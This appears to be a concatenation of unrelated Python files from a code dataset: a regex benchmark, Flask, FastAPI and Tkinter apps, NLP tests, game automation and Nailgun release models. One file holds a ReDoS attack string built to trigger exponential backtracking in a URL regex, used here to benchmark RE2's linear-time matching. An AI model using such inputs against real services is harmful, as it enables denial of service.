3206709 | from sys import path
from os.path import dirname as dir
path.append(dir(path[0]))
from optimization.genOptimized import optimizeCode
# print(result[0].execute(None))
# print(result[1].execute(None))
# print(grammar.returnPostgreSQLErrors())
s = '''
from goto import with_goto
from interpreter import execution
from c3d.stack import Stack
stack = Stack()
RETURN=[None]
pprueba()
@with_goto
def calculos(xd,valor):
ejemplo = valor
t0 = ejemplo / valor
example = t0
test = ''
valor = 100
t1 = valor < 1
if t1: goto .L1
goto .L2
label .L1 #etiqueta true
t2 = -1
if valor == t2: goto .L5
RETURN[0] = True
goto .L0
goto .L4
label .L5
RETURN[0] = False
goto .L0
goto .L4
label .L4
goto .L3 #EXIT
label .L2 #etiqueta false
t3 = valor > 100
if t3: goto .L6
goto .L7
label .L6 #etiqueta true
RETURN[0] = False
goto .L0
goto .L3 #EXIT
label .L7 #etiqueta false
RETURN[0] = True
goto .L0
label .L3 # SALE DEL IF
RETURN[0] = valor
goto .L0
label .L0
@with_goto
def nacimiento(xd):
t4 = xd == '4'
if t4: goto .L9
goto .L10
label .L9 #etiqueta true
RETURN[0] = False
goto .L8
goto .L11 #EXIT
label .L10 #etiqueta false
RETURN[0] = True
goto .L8
label .L11 # SALE DEL IF
RETURN[0] = valor
goto .L8
label .L8
@with_goto
def pprueba():
print('Hola' , 'Z')
RETURN[0] = hola
goto .L12
label .L12
@with_goto
def ptesteo(valor):
x = 0
print('Hola' , 'Z')
pprueba()
t5 = 5 * 9
t6 = t5 / 1
t7 = 4 + t6
valor = t7
t8 = valor + 0
valor = t8
t9 = valor - 0
valor = t9
t10 = valor * 0
valor = t10
t11 = 0 / valor
valor = t11
t12 = valor / 1
valor = t12
t13 = x / 1
valor = t13
t14 = x * 1
valor = t14
t15 = x + 0
valor = t15
t16 = x - 0
valor = t16
t17 = x * 2
valor = t17
t18 = valor * 2
valor = t18
label .L13
@with_goto
def principal():
ptesteo(50)
def funcionIntermedia():
return execution(stack.pop())
principal()
'''
optimizeCode(s) | StarcoderdataPython |
198030 | <filename>regexlib/python_re2_test_file/regexlib_4184.py
# 4184
# ((http|https|ftp|telnet|gopher|ms\-help|file|notes)://)?(([a-z][\w~%!&',;=\-\.$\(\)\*\+]*)(:.*)?@)?(([a-z0-9][\w\-]*[a-z0-9]*\.)*(((([a-z0-9][\w\-]*[a-z0-9]*)(\.[a-z0-9]+)?)|(((25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)))(:[0-9]+)?))?(((/([\w`~!$=;\-\+\.\^\(\)\|\{\}\[\]]|(%\d\d))+)*/([\w`~!$=;\-\+\.\^\(\)\|\{\}\[\]]|(%\d\d))*)(\?[^#]+)?(#[a-z0-9]\w*)?)?
# EXPONENT
# nums:5
# EXPONENT AttackString:""+"00."*32+"! _1_EOA(i or ii)"
import re2 as re
from time import perf_counter
# ReDoS benchmark: the regexlib pattern above is flagged "EXPONENT"
# (exponential backtracking) in the corpus header; RE2's automaton-based
# engine should stay linear, and this loop measures search time on ever
# longer attack strings to confirm it.
regex = """((http|https|ftp|telnet|gopher|ms\-help|file|notes)://)?(([a-z][\w~%!&',;=\-\.$\(\)\*\+]*)(:.*)?@)?(([a-z0-9][\w\-]*[a-z0-9]*\.)*(((([a-z0-9][\w\-]*[a-z0-9]*)(\.[a-z0-9]+)?)|(((25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)))(:[0-9]+)?))?(((/([\w`~!$=;\-\+\.\^\(\)\|\{\}\[\]]|(%\d\d))+)*/([\w`~!$=;\-\+\.\^\(\)\|\{\}\[\]]|(%\d\d))*)(\?[^#]+)?(#[a-z0-9]\w*)?)?"""
REGEX = re.compile(regex)
for i in range(0, 150000):
    # attack string grows with i: "00." repeated, then a non-matching tail
    ATTACK = "" + "00." * i * 1 + "! _1_EOA(i or ii)"
    LEN = len(ATTACK)  # NOTE(review): unused
    BEGIN = perf_counter()
    m = REGEX.search(ATTACK)
    # m = REGEX.match(ATTACK)
    DURATION = perf_counter() - BEGIN
print(f"{i *1}: took {DURATION} seconds!") | StarcoderdataPython |
150653 | from flask import render_template, url_for
from . import main
# from app import app
from ..request import get_source, get_source_articles
# Views
@main.route('/')
def index():
    '''
    Root view: render the index page with the available news sources.
    '''
    # Getting news headlines
    news_source = get_source()
    title = 'Home - Top News'
    return render_template('index.html', title = title, sources = news_source)
@main.route('/sources/<id>')
def source_articles(id):
    '''
    Render the articles page for the news source identified by *id*.
    '''
    articles = get_source_articles(id)
    return render_template('articles.html', articles = articles)
@main.route('/about')
def about():
    # Static "about" page; no data needed.
    return render_template('about.html')
| StarcoderdataPython |
# NOTE(review): the line below is fused with a dataset record id
# ("3210955 | ") -- corrupted record boundary.  calc(a, b) returns a + b.
3210955 | def calc(num1, num2):
    return num1+num2
print(calc(5,6)) | StarcoderdataPython |
3254702 | <reponame>luovkle/FastAPI-Note-Taking<filename>backend/app/app/api/api_v1/endpoints/login.py
from fastapi import APIRouter, Depends
from fastapi.security import OAuth2PasswordRequestForm
from sqlalchemy.orm import Session
from app.api.deps import get_db
from app.crud import crud_user
from app.core.security import create_access_token
from app.schemas import Token
router = APIRouter()
@router.post(path="/access-token", response_model=Token)
def login(
    db: Session = Depends(get_db),
    form_data: OAuth2PasswordRequestForm = Depends()
):
    """OAuth2 password-flow login: verify credentials and issue an access token.

    NOTE(review): no failure branch exists here -- crud_user.authenticate is
    assumed to raise (e.g. an HTTPException) on bad credentials; confirm.
    """
    user = crud_user.authenticate(
        db=db, username=form_data.username, password=form_data.password
    )
    access_token = create_access_token(sub=user.username)
    return {"access_token": access_token, "token_type": "Bearer"}
| StarcoderdataPython |
3357535 | import pytest
from runrex.text import Document
from apanc_nlp.algo.pain import AbdPain, extract_duration, RADIATING_TO_BACK, CHRONIC, CHEST_PAIN, DURATION, \
is_close_to_pain, has_abdominal_pain
@pytest.mark.parametrize('exp, text', [
    (AbdPain.RECENT, '1 week'),
    (AbdPain.VERY_RECENT, '2 days'),
    (AbdPain.VERY_RECENT, '2 d'),
    (AbdPain.LONG_AGO, '2 mons'),
    (AbdPain.LONG_AGO, '2mons'),
    (AbdPain.LONG_AGO, '2.mons'),
    (AbdPain.RECENT, '2 WEEKS'),
    (AbdPain.RECENT, '1 Week'),
])
def test_extract_duration(exp, text):
    """Duration phrases map to the expected AbdPain recency bucket, case-insensitively."""
    assert extract_duration(text) == exp
def test_radiate_to_back():
    """The RADIATING_TO_BACK pattern matches a plain textual mention."""
    assert RADIATING_TO_BACK.matches('radiates to back')
@pytest.mark.parametrize('text, exp', [
    ('chronic opioid use for pain', False),
    ('recurrent depression', False),
    ('chronic pain', True),
    ('chronic abd pain', True),
])
def test_chronic(text, exp):
    """CHRONIC fires on chronic-pain mentions but not other chronic conditions."""
    assert bool(CHRONIC.matches(text)) is exp
@pytest.mark.parametrize('text, exp', [
    ('negative for chest pain', False),
    ('chest pain', True),
])
def test_chest(text, exp):
    """CHEST_PAIN must not fire on negated mentions."""
    assert bool(CHEST_PAIN.matches(text)) is exp
@pytest.mark.parametrize('text, exp', [
    ('pain for 1 week', True),
    ('pain at night for 1 week', True),  # ensure 'ht' not picked up here
    ('pain blah blah blah ht. 1.78m', False),
])
def test_duration(text, exp):
    """DURATION matches pain-duration phrases but ignores e.g. height ('ht.')."""
    assert bool(DURATION.matches(text)) is exp
@pytest.mark.parametrize('text, start, end, window, exp', [
    ('pain for 1 week', 9, 15, 20, True),
    ('1 week of acute pain', 0, 6, 20, True),
    ('pain blah blah blah blah blah 1 week', 30, 36, 20, False),
    ('1 week of joy and happiness blah blah blah blah blah pain', 0, 6, 20, False),
])
def test_is_close_to_pain(text, start, end, window, exp):
    """A duration span at [start, end) counts only if a pain mention lies within *window* chars."""
    assert is_close_to_pain(text, start, end, window) == exp
@pytest.mark.parametrize('text, exp', [
    ('pain for 1 week', AbdPain.RECENT),
    ('1 week of acute pain', AbdPain.RECENT),
    ('pain blah blah blah blah blah 1 week', None),
    ('1 week of joy and happiness blah blah blah blah blah pain', None),
])
def test_has_abdominal_pain(text, exp):
    """End-to-end: a document yields the expected recency, or nothing when
    the duration is too far from the pain mention."""
    doc = Document('noname', text=text)
    lst = list(has_abdominal_pain(doc, window=20))
    if len(lst) == 0:
        assert exp is None
    else:
        # has_abdominal_pain yields (result, text, start, end) tuples
        result, text, start, end = lst[0]
        assert result == exp
| StarcoderdataPython |
155813 | <reponame>yuanyan3060/arknights-mower
import time
import schedule
from arknights_mower.strategy import Solver
from arknights_mower.utils.log import logger, init_fhlr
from arknights_mower.utils import config
# Use drones to speed up manufacturing in room 3 on floor 3
drone_room='room_3_3'
# Operation plan for the specified stage sequence
ope_lists = [['AP-5', 1], ['1-7', -1]]
# Priority (high to low) for buying items in the shop with credit points
shop_priority = ['招聘许可', '赤金', '龙门币', '初级作战记录', '技巧概要·卷2', '基础作战记录', '技巧概要·卷1']
# Priority (high to low) of operators to prefer when picking recruitment tags
recruit_priority = ['因陀罗', '火神']
# Custom base (infrastructure) shift schedule.
# This defines a two-shift rotation split into four stages:
# stages 1 and 2 are the first shift, stages 3 and 4 the second.
# First-shift operators rest in two batches during stages 3 and 4,
# and the second shift does likewise during stages 1 and 2.
# Each stage lasts 6 hours.
plan = {
    # Stage 1
    'plan_1': {
        # Office
        'contact': ['艾雅法拉'],
        # Dormitories
        'dormitory_1': ['杜林', '闪灵', '安比尔', '空弦', '缠丸'],
        'dormitory_2': ['推进之王', '琴柳', '赫默', '杰西卡', '调香师'],
        'dormitory_3': ['夜莺', '波登可', '夜刀', '古米', '空爆'],
        'dormitory_4': ['空', 'Lancet-2', '香草', '史都华德', '刻俄柏'],
        # Reception room
        'meeting': ['陈', '红'],
        # Factory + trading post + power plant rooms
        'room_1_1': ['德克萨斯', '能天使', '拉普兰德'],
        'room_1_2': ['断罪者', '食铁兽', '槐琥'],
        'room_1_3': ['阿消'],
        'room_2_1': ['巫恋', '柏喙', '慕斯'],
        'room_2_2': ['红豆', '霜叶', '白雪'],
        'room_2_3': ['雷蛇'],
        'room_3_1': ['Castle-3', '梅尔', '白面鸮'],
        'room_3_2': ['格雷伊'],
        'room_3_3': ['砾', '夜烟', '斑点']
    },
    # Stage 2
    'plan_2': {
        # Rooms whose assignment is identical to stage 1 are commented out
        # to speed up rescheduling
        # 'contact': ['艾雅法拉'],
        'dormitory_1': ['杜林', '闪灵', '芬', '稀音', '克洛丝'],
        'dormitory_2': ['推进之王', '琴柳', '清流', '森蚺', '温蒂'],
        'dormitory_3': ['夜莺', '波登可', '伊芙利特', '深靛', '炎熔'],
        'dormitory_4': ['空', 'Lancet-2', '远山', '星极', '普罗旺斯'],
        # 'meeting': ['陈', '红'],
        # 'room_1_1': ['德克萨斯', '能天使', '拉普兰德'],
        # 'room_1_2': ['断罪者', '食铁兽', '槐琥'],
        # 'room_1_3': ['阿消'],
        # 'room_2_1': ['巫恋', '柏喙', '慕斯'],
        # 'room_2_2': ['红豆', '霜叶', '白雪'],
        # 'room_2_3': ['雷蛇'],
        # 'room_3_1': ['Castle-3', '梅尔', '白面鸮'],
        # 'room_3_2': ['格雷伊'],
        # 'room_3_3': ['砾', '夜烟', '斑点']
    },
    # Stage 3 (second shift on duty; first shift starts resting)
    'plan_3': {
        'contact': ['普罗旺斯'],
        'dormitory_1': ['杜林', '闪灵', '格雷伊', '雷蛇', '阿消'],
        'dormitory_2': ['推进之王', '琴柳', '德克萨斯', '能天使', '拉普兰德'],
        'dormitory_3': ['夜莺', '波登可', '巫恋', '柏喙', '慕斯'],
        'dormitory_4': ['空', 'Lancet-2', '艾雅法拉', '陈', '红'],
        'meeting': ['远山', '星极'],
        'room_1_1': ['安比尔', '空弦', '缠丸'],
        'room_1_2': ['赫默', '杰西卡', '调香师'],
        'room_1_3': ['伊芙利特'],
        'room_2_1': ['夜刀', '古米', '空爆'],
        'room_2_2': ['香草', '史都华德', '刻俄柏'],
        'room_2_3': ['深靛'],
        'room_3_1': ['芬', '稀音', '克洛丝'],
        'room_3_2': ['炎熔'],
        'room_3_3': ['清流', '森蚺', '温蒂']
    },
    # Stage 4
    'plan_4': {
        # 'contact': ['普罗旺斯'],
        'dormitory_1': ['杜林', '闪灵', '断罪者', '食铁兽', '槐琥'],
        'dormitory_2': ['推进之王', '琴柳', '红豆', '霜叶', '白雪'],
        'dormitory_3': ['夜莺', '波登可', 'Castle-3', '梅尔', '白面鸮'],
        'dormitory_4': ['空', 'Lancet-2', '砾', '夜烟', '斑点'],
        # 'meeting': ['远山', '星极'],
        # 'room_1_1': ['安比尔', '空弦', '缠丸'],
        # 'room_1_2': ['赫默', '杰西卡', '调香师'],
        # 'room_1_3': ['伊芙利特'],
        # 'room_2_1': ['夜刀', '古米', '空爆'],
        # 'room_2_2': ['香草', '史都华德', '刻俄柏'],
        # 'room_2_3': ['深靛'],
        # 'room_3_1': ['芬', '稀音', '克洛丝'],
        # 'room_3_2': ['炎熔'],
        # 'room_3_3': ['清流', '森蚺', '温蒂']
    }
}
def debuglog():
    '''
    Print debug-level log messages to the screen, to help with
    debugging and error reporting.
    '''
    logger.handlers[0].setLevel('DEBUG')
def savelog():
    '''
    Configure where logs and screenshots are saved, to help with
    debugging and error reporting.
    Debug output and screenshots are stored under the directory
    containing this script by default.
    '''
    config.LOGFILE_PATH = './log'
    config.SCREENSHOT_PATH = './screenshot'
    config.SCREENSHOT_MAXNUM = 100  # keep at most this many screenshots
    init_fhlr()
def simulate():
    '''
    Run one full round of daily tasks; see each Solver method's
    parameters for the details of every step.
    '''
    global ope_lists
    cli = Solver()
    cli.mail() # collect mail
    cli.base(clue_collect=True, drone_room=drone_room, arrange=plan) # base: clues, drones, shift plan
    cli.credit() # earn credit points
    ope_lists = cli.ope(eliminate=True, plan=ope_lists) # operations; returns the unfinished plan
    cli.shop(shop_priority) # spend credits in the shop
    cli.recruit() # recruitment
    cli.mission() # claim mission rewards
def schedule_task():
    """
    Run simulate() on a fixed daily schedule (07:00 and 19:00),
    polling once per minute.  Never returns.
    """
    schedule.every().day.at('07:00').do(simulate)
    schedule.every().day.at('19:00').do(simulate)
    while True:
        schedule.run_pending()
        time.sleep(60)
# Entry point: enable debug logging, configure log/screenshot paths,
# run one round immediately, then keep running on the daily schedule.
debuglog()
savelog()
simulate()
schedule_task()
| StarcoderdataPython |
130736 | <gh_stars>0
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# OpenCenter(TM) is Copyright 2013 by Rackspace US, Inc.
##############################################################################
#
# OpenCenter is licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License. This
# version of OpenCenter includes Rackspace trademarks and logos, and in
# accordance with Section 6 of the License, the provision of commercial
# support services in conjunction with a version of OpenCenter which includes
# Rackspace trademarks and logos is prohibited. OpenCenter source code and
# details are available at: # https://github.com/rcbops/opencenter or upon
# written request.
#
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0 and a copy, including this
# notice, is available in the LICENSE file accompanying this software.
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the # specific language governing permissions and limitations
# under the License.
#
##############################################################################
import json
import random
from opencenter.db.database import init_db
from opencenter import webapp
from util import OpenCenterTestCase, ScaffoldedTestCase
class IndexTest(OpenCenterTestCase):
    """API tests for the '/' index endpoint."""
    def setUp(self):
        # All requests in these tests are made with a JSON content type.
        self.content_type = 'application/json'
    def tearDown(self):
        pass
    def test_get_index(self):
        """GET / returns 200 with a 'url' field and a resource map whose
        entries each carry their own 'url'."""
        resp = self.client.get('/',
                               content_type=self.content_type)
        self.assertEquals(resp.status_code, 200)
        out = json.loads(resp.data)
        self.assertTrue('url' in out)
        self.assertIsInstance(out['resources'], dict)
        resources = ['adventures', 'attrs', 'facts', 'filters',
                     'primitives', 'nodes', 'tasks']
        for resource in resources:
            self.assertTrue(resource in out['resources'])
            self.assertTrue('url' in out['resources'][resource])
| StarcoderdataPython |
3235884 | <filename>nailgun/nailgun/objects/release.py
# -*- coding: utf-8 -*-
# Copyright 2013 Mirantis, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Release object and collection
"""
import copy
import six
from sqlalchemy import not_
from nailgun import consts
from nailgun.objects.serializers import release as release_serializer
from nailgun.db import db
from nailgun.db.sqlalchemy import models
from nailgun.objects import NailgunCollection
from nailgun.objects import NailgunObject
from nailgun.settings import settings
class ReleaseOrchestratorData(NailgunObject):
    """ReleaseOrchestratorData object
    """
    #: SQLAlchemy model
    model = models.ReleaseOrchestratorData
    #: Serializer for ReleaseOrchestratorData
    serializer = release_serializer.ReleaseOrchestratorDataSerializer
    #: JSON schema
    schema = {
        "$schema": "http://json-schema.org/draft-04/schema#",
        "title": "ReleaseOrchestratorData",
        "description": "Serialized ReleaseOrchestratorData object",
        "type": "object",
        "required": [
            "release_id"
        ],
        "properties": {
            "id": {"type": "number"},
            "release_id": {"type": "number"},
            "repo_metadata": {"type": "object"},
            "puppet_manifests_source": {"type": "string"},
            "puppet_modules_source": {"type": "string"}
        }
    }
    @classmethod
    def create(cls, data):
        """Create an instance after rendering path templates in *data*."""
        rendered_data = cls.render_data(data)
        return super(ReleaseOrchestratorData, cls).create(rendered_data)
    @classmethod
    def update(cls, instance, data):
        """Update *instance* after rendering path templates in *data*."""
        rendered_data = cls.render_data(data)
        return super(ReleaseOrchestratorData, cls).update(
            instance, rendered_data)
    @classmethod
    def render_data(cls, data):
        """Return a copy of *data* with {MASTER_IP}/{OPENSTACK_VERSION}
        placeholders substituted in repo and puppet source paths."""
        # Actually, we don't have any reason to make copy at least now.
        # The only reason I want to make copy is to be sure that changed
        # data don't broke something somewhere in the code, since
        # without a copy our changes affect entire application.
        rendered_data = copy.deepcopy(data)
        # create context for rendering
        release = Release.get_by_uid(rendered_data['release_id'])
        context = {
            'MASTER_IP': settings.MASTER_IP,
            'OPENSTACK_VERSION': release.version}
        # render all the paths (both keys and values of repo_metadata)
        repo_metadata = {}
        for key, value in six.iteritems(rendered_data['repo_metadata']):
            formatted_key = cls.render_path(key, context)
            repo_metadata[formatted_key] = cls.render_path(value, context)
        rendered_data['repo_metadata'] = repo_metadata
        rendered_data['puppet_manifests_source'] = \
            cls.render_path(rendered_data.get(
                'puppet_manifests_source', 'default'), context)
        rendered_data['puppet_modules_source'] = \
            cls.render_path(rendered_data.get(
                'puppet_modules_source', 'default'), context)
        return rendered_data
    @classmethod
    def render_path(cls, path, context):
        """Substitute the context placeholders into a single path template."""
        return path.format(**context)
class Release(NailgunObject):
    """Release object
    """
    #: SQLAlchemy model for Release
    model = models.Release
    #: Serializer for Release
    serializer = release_serializer.ReleaseSerializer
    #: Release JSON schema
    schema = {
        "$schema": "http://json-schema.org/draft-04/schema#",
        "title": "Release",
        "description": "Serialized Release object",
        "type": "object",
        "required": [
            "name",
            "operating_system"
        ],
        "properties": {
            "id": {"type": "number"},
            "name": {"type": "string"},
            "version": {"type": "string"},
            "can_update_from_versions": {"type": "array"},
            "description": {"type": "string"},
            "operating_system": {"type": "string"},
            "state": {
                "type": "string",
                "enum": list(consts.RELEASE_STATES)
            },
            "networks_metadata": {"type": "array"},
            "attributes_metadata": {"type": "object"},
            "volumes_metadata": {"type": "object"},
            "modes_metadata": {"type": "object"},
            "roles_metadata": {"type": "object"},
            "wizard_metadata": {"type": "object"},
            "roles": {"type": "array"},
            "clusters": {"type": "array"},
            "is_deployable": {"type": "boolean"}
        }
    }
    @classmethod
    def create(cls, data):
        """Create Release instance with specified parameters in DB.
        Corresponding roles are created in DB using names specified
        in "roles" field. See :func:`update_roles`

        :param data: dictionary of key-value pairs as object fields
        :returns: Release instance
        """
        # "roles" and "orchestrator_data" are stored via their own objects,
        # so strip them from the payload before creating the Release row.
        roles = data.pop("roles", None)
        orch_data = data.pop("orchestrator_data", None)
        new_obj = super(Release, cls).create(data)
        if roles:
            cls.update_roles(new_obj, roles)
        if orch_data:
            orch_data["release_id"] = new_obj.id
            ReleaseOrchestratorData.create(orch_data)
        return new_obj
    @classmethod
    def update(cls, instance, data):
        """Update existing Release instance with specified parameters.
        Corresponding roles are updated in DB using names specified
        in "roles" field. See :func:`update_roles`

        :param instance: Release instance
        :param data: dictionary of key-value pairs as object fields
        :returns: Release instance
        """
        roles = data.pop("roles", None)
        orch_data = data.pop("orchestrator_data", None)
        super(Release, cls).update(instance, data)
        # An empty list is a valid value here ("remove all roles"), so the
        # check is against None rather than truthiness (unlike create()).
        if roles is not None:
            cls.update_roles(instance, roles)
        if orch_data:
            cls.update_orchestrator_data(instance, orch_data)
        return instance
    @classmethod
    def update_roles(cls, instance, roles):
        """Update existing Release instance with specified roles.
        Previous ones are deleted.

        IMPORTANT NOTE: attempting to remove roles that are already
        assigned to nodes will lead to an Exception.

        :param instance: Release instance
        :param roles: list of new roles names
        :returns: None
        """
        # Delete roles that are no longer listed; 'fetch' keeps the session
        # consistent with the bulk delete.
        db().query(models.Role).filter(
            not_(models.Role.name.in_(roles))
        ).filter(
            models.Role.release_id == instance.id
        ).delete(synchronize_session='fetch')
        db().refresh(instance)
        added_roles = instance.roles
        for role in roles:
            if role not in added_roles:
                new_role = models.Role(
                    name=role,
                    release=instance
                )
                db().add(new_role)
                added_roles.append(role)
        db().flush()
    @classmethod
    def update_orchestrator_data(cls, instance, orchestrator_data):
        """Re-render and store orchestrator data for *instance*."""
        orchestrator_data.pop("id", None)
        orchestrator_data["release_id"] = instance.id
        ReleaseOrchestratorData.update(
            instance.orchestrator_data, orchestrator_data)
    @classmethod
    def get_orchestrator_data_dict(cls, instance):
        """Return the release's orchestrator data serialized to a dict."""
        data = instance.orchestrator_data
        return ReleaseOrchestratorData.serializer.serialize(data)
    @classmethod
    def is_deployable(cls, instance):
        """Returns whether a given release deployable or not.

        :param instance: a Release instance
        :returns: True if a given release is deployable; otherwise - False
        """
        # in experimental mode we deploy all releases
        if 'experimental' in settings.VERSION['feature_groups']:
            return True
        return instance.is_deployable
class ReleaseCollection(NailgunCollection):
    """Release collection
    """
    #: Single Release object class
    single = Release
| StarcoderdataPython |
1733672 | #--------------------------------------------------------------------------------------------------
# Import required libraries
from tkinter import *
from tkinter import colorchooser
from tkinter import messagebox
from tkinter import ttk
from tkinter import filedialog
import cv2
from PIL import Image, ImageTk
import numpy as np
import os
#--------------------------------------------------------------------------------------------------
# Module-level state shared by the canvas callbacks below.
global array   # NOTE(review): 'global' at module level is a no-op statement
global array2
global array3
array=[]    # flat [x0, y0, x1, y1, ...] of polygon vertices clicked so far
array2=[]   # same vertices as [x, y] pairs (used for the OpenCV fill)
array3=[]   # NOTE(review): never used in the visible code
#--------------------------------------------------------------------------------------------------
# Main application window (resized to full screen once a folder is chosen).
App = Tk()
App.iconbitmap(default='favicon.ico')
App.title("Image Segmentation Tool")
App.geometry("400x400")
#--------------------------------------------------------------------------------------------------
# Functions and Actions
def selectfolder():
    """Prompt for an image folder, list its files, and open the editor page.

    Ensures a ``Segmentation`` sub-folder exists for the output masks,
    fills the file listbox, then swaps the landing page for the
    maximized segmentation page.
    """
    global filename
    filename = filedialog.askdirectory()
    isFile = os.path.isdir(filename + "/" + "Segmentation")
    if (not isFile):
        os.mkdir(filename + "/" + "Segmentation")
    print(filename)
    # NOTE(review): os.walk recurses into sub-folders, so files from the
    # Segmentation output folder are listed too — confirm intended.
    for r, d, files in os.walk(filename):
        for file in files:
            directoryview.insert(END, file)
    landingPage.destroy()
    App.geometry("{0}x{1}+0+0".format(App.winfo_screenwidth()-20, App.winfo_screenheight()-80))
    App.resizable(0, 0)
    imsegpage.pack(fill=BOTH)
def showimg(event):
    """Listbox callback: load the selected image onto the canvas.

    Also allocates a black segmentation map of the same size; polygon
    fills are rasterized into it and saved later by ``save``.
    """
    n = directoryview.curselection()
    global fname, img, segmap
    fname = directoryview.get(n)
    imsegcanvas.delete("all")
    imgpath = filename + "/" + fname
    img = Image.open(imgpath)
    imgwidth, imgheight = img.size
    # img = img.resize((300, 300), Image.ANTIALIAS)
    # Segmentation map: note numpy uses (rows, cols) = (height, width).
    segmap = np.zeros((imgheight, imgwidth, 3), np.uint8)
    img = ImageTk.PhotoImage(img)
    imsegcanvas.config(width=imgwidth, height=imgheight, scrollregion=(0, 0, imgwidth, imgheight))
    imsegcanvas.create_image(0, 0, anchor=NW, image=img)
def choose_color():
    """Open a color picker; keep both the RGB tuple (clf) and hex string."""
    global color_code
    global clf
    clf = colorchooser.askcolor(title="Choose color")
    # askcolor returns ((r, g, b), "#rrggbb"); index 1 is the hex string.
    color_code = clf[1]
    print(color_code)
def point(event):
    """Double-click handler: drop a polygon vertex at the cursor.

    The vertex goes into the flat coordinate list (for the Tk polygon)
    and the pair list (for the OpenCV fill).
    """
    try:
        x1, y1 = (imsegcanvas.canvasx(event.x) - 1), (imsegcanvas.canvasy(event.y) - 1)
        imsegcanvas.create_oval(x1 - 2, y1 - 2, x1 + 2, y1 + 2, fill="#ff0000")
        array.append(x1)
        array.append(y1)
        array2.append([x1, y1])
    except Exception:
        # Narrowed from a bare `except:` which also swallowed
        # KeyboardInterrupt and SystemExit.
        messagebox.showerror("Error", "Error Occured")
def clearcanvas(event):
    """Middle-click handler: wipe the canvas and redraw the current image."""
    imsegcanvas.delete("all")
    imsegcanvas.create_image(0, 0, anchor=NW, image=img)
    # Keep a reference on the widget so the PhotoImage is not GC'd.
    imsegcanvas.image = img
    messagebox.showinfo("Message", "Segmap Cleared")
def genpolygon(event):
    """Right-click handler: close the current polygon.

    Draws it on the Tk canvas and rasterizes it into the segmentation
    map (channel order reversed to BGR for OpenCV), then clears the
    vertex buffers for the next polygon.
    """
    try:
        imsegcanvas.create_polygon(array, outline=color_code, fill=color_code, width=3, stipple="gray50")
        pts = np.array(array2, np.int32)
        pts = pts.reshape((-1, 1, 2))
        cv2.fillPoly(segmap, [pts], [clf[0][2], clf[0][1], clf[0][0]], 1)
        array2.clear()
        array.clear()
    except Exception:
        # Narrowed from a bare `except:` so Ctrl-C/SystemExit propagate.
        messagebox.showerror("Error", "Error Occured")
def outline(event):
    """Drag handler: freehand-trace vertices while button 1 is held."""
    try:
        x1, y1 = (imsegcanvas.canvasx(event.x) - 1), (imsegcanvas.canvasy(event.y) - 1)
        imsegcanvas.create_oval(x1 - 1, y1 - 1, x1 + 1, y1 + 1, fill="#ff0000")
        array.append(x1)
        array.append(y1)
        array2.append([x1, y1])
    except Exception:
        # Narrowed from a bare `except:` which also swallowed
        # KeyboardInterrupt and SystemExit.
        messagebox.showerror("Error", "Error Occured")
def save():
    """Write the current segmentation map into the Segmentation folder.

    NOTE: the module later rebinds the name ``save`` to a Button widget;
    the Button's command captured this function first, so it still works.
    """
    print(filename + "/Segmentation/" + fname)
    cv2.imwrite(filename + "/Segmentation/" + fname, segmap)
    messagebox.showinfo("Message", "Image Saved")
# def bbox(event):
# if len(array3)>=3:
# imsegcanvas.create_rectangle(array3[0],array3[1],array3[2],array3[3],fill="")
# array3.clear()
# x1, y1 = (imsegcanvas.canvasx(event.x) - 1), (imsegcanvas.canvasy(event.y) - 1)
# imsegcanvas.create_oval(x1 - 2, y1 - 2, x1 + 2, y1 + 2, fill="#ff0000")
# array3.append(x1)
# array3.append(y1)
#--------------------------------------------------------------------------------------------------
# Landing page: logo canvas plus a button that kicks off folder selection.
global landingPage
landingPage = Frame(App)
landingText = Label(landingPage, text="An Image Segmentation Tool using Tkinter and OpenCV")
selectFolder = Button(landingPage, text="Select Image Folder", command=selectfolder)
canvas = Canvas(landingPage, width=300, height=300)
imgland = Image.open("Segvizlogo.png")
imgland = imgland.resize((300, 300), Image.ANTIALIAS)
imgland = ImageTk.PhotoImage(imgland)
canvas.create_image(20, 20, anchor=NW, image=imgland)
canvas.pack()
selectFolder.pack(side=BOTTOM, fill=BOTH)
landingText.pack(fill=BOTH, side=BOTTOM)
landingPage.pack()
#--------------------------------------------------------------------------------------------------
# Image segmentation page: image canvas + file listbox + scrollbars + tools tab.
global imsegpage
global canvasimage
global imsegcanvas
global imageoncanvas
global wt, ht
imsegpage = Frame(App)
currentimage = Image.open("segvizbg.png")
currentimage = currentimage.resize((250, 250), Image.ANTIALIAS)
wt, ht = currentimage.size
imsegcanvas = Canvas(imsegpage, width=wt, height=ht)
canvasimage = ImageTk.PhotoImage(currentimage)
imsegcanvas.create_image(0, 0, anchor=NW, image=canvasimage)
# List Box for files
global directoryview
directoryview = Listbox(imsegpage)
directoryview.bind("<<ListboxSelect>>", showimg)
directoryview.pack(side="left", fill=Y, expand=False)
# Scrollbars for Image
scroll_x = Scrollbar(imsegpage, orient="horizontal", command=imsegcanvas.xview)
scroll_y = Scrollbar(imsegpage, orient="vertical", command=imsegcanvas.yview)
imsegcanvas.configure(yscrollcommand=scroll_y.set, xscrollcommand=scroll_x.set)
scroll_x.pack(side=BOTTOM, fill=X)
scroll_y.pack(side=RIGHT, fill=Y)
# Tab Control
tabControl = ttk.Notebook(imsegpage)
tab1 = ttk.Frame(tabControl)
selectcolor = Button(tab1, text="Select Color", command=choose_color)
# NOTE(review): rebinds the module-level name `save` (the function) to the
# Button; the command= reference was captured beforehand so this works.
save = Button(tab1, text="Save Segmentation", command=save)
tabControl.add(tab1, text='Tools')
# Pack the widgets
